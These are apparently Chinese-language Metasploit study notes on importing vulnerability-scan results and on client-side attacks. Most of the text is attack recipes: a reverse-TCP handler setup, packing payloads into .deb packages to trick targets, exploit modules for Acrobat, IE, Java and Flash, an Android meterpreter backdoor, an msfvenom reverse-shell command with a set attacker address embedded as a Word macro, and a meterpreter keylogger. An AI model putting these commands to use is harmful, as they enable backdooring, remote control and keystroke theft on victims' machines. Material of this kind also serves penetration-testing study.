扫描器扫描
Openvas(GVM)
Load openvas
- 命令行模式,需要配置,使用繁琐
直接在opevas扫描,向msf导入nbe格式扫描日志
- db_import openvas.nbe
Nessus
Nextpose
- xml格式
客户端渗透
- 在无法突破网路边界的情况下转而攻击客户端
- 社会工程学攻击
- 进而渗透线上业务网络
- 含有漏洞利用代码的WEB站点
- 利用客户端漏洞
- 含有漏洞利用代码的DOC、PDF等文档
- 诱骗被害者执行Payload
打包payload进deb安装包
- 先用msfvenom生成pyaload
- use exploit/multi/handler
- set payload windows/shell/reverse_tcp
- set LHOST xxx;set LPORT xxx;
- exploit(侦听端口)
- 想办法让payload执行
- Linux下可以把payload打包进deb,然后诱使目标执行。
其它方式
- 利用Acrobat Reader漏洞执行payload
- 构造PDF文件:exploit/widows/fileformat/adobe_utilprintf
- 构造恶意网站:exploit/windows/browser/adobe_utilprintf
- IE浏览器漏洞:search ms14_064
- JRE漏洞:search java_jre
- flash漏洞:exploit/multi/browser/adobe_flash_hacking_team_uaf
- 生成Android后门程序
- use payload/android/meterpreter/reverse_tcp
- generate -f a.apk -p android -t raw
- VBScript感染方式
- 利用宏感染word、excel
- 绕过某些基于文件类型检查的安全机制
- 生成vbscript脚本:
- msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.43.125 LPORT=4444 -e x86/shikata_ga_nai -f vba.exe
- 在word把payload第一部分VBA代码保存成宏,随便起个名字
- payload第二部分粘贴入word文档正文
- Meterpreter
- use priv
- run post/windows/capture/keylog_recorder
- search browser_autopwn
其它
apt-get install 下载目录/var/cache/apt/archives